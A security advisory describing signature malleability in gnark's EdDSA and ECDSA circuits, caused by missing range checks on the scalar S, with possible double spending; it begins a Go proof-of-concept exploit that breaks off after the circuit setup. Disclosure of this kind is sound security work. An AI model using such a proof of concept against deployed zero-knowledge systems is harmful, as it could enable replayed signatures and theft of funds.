gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks

In version before, sig.s used without asserting 0 ≤ S < order in Verify function in eddsa.go and ecdsa.go, which will lead to signature malleability vulnerability. Impact Since gnark’s native EdDSA and ECDSA circuits lack essential constraints, multiple distinct witnesses can satisfy the same public inputs. In protocols where nullifiers or anti-replay checks are derived from (R, S), this enables signature malleability and may lead to double spending. Exploitation “`go package main import ( "crypto/rand" "fmt" "math/big" "github.com/consensys/gnark-crypto/ecc" mimcHash "github.com/consensys/gnark-crypto/ecc/bn254/fr/mimc" eddsaCrypto "github.com/consensys/gnark-crypto/ecc/bn254/twistededwards/eddsa" "github.com/consensys/gnark/backend/groth16" "github.com/consensys/gnark/frontend" "github.com/consensys/gnark/frontend/cs/r1cs" "github.com/consensys/gnark/std/algebra/native/twistededwards" stdMimc "github.com/consensys/gnark/std/hash/mimc" stdEddsa "github.com/consensys/gnark/std/signature/eddsa" te "github.com/consensys/gnark-crypto/ecc/twistededwards" ) // Circuit type eddsaCircuit struct { Msg frontend.Variable gnark:",public" Pk stdEddsa.PublicKey gnark:",public" Sig stdEddsa.Signature } func (c *eddsaCircuit) Define(api frontend.API) error { curve, _ := twistededwards.NewEdCurve(api, te.BN254) hasher, _ := stdMimc.NewMiMC(api) stdEddsa.Verify(curve, c.Sig, c.Msg, c.Pk, &hasher) return nil } func groupOrder() *big.Int { //…Read More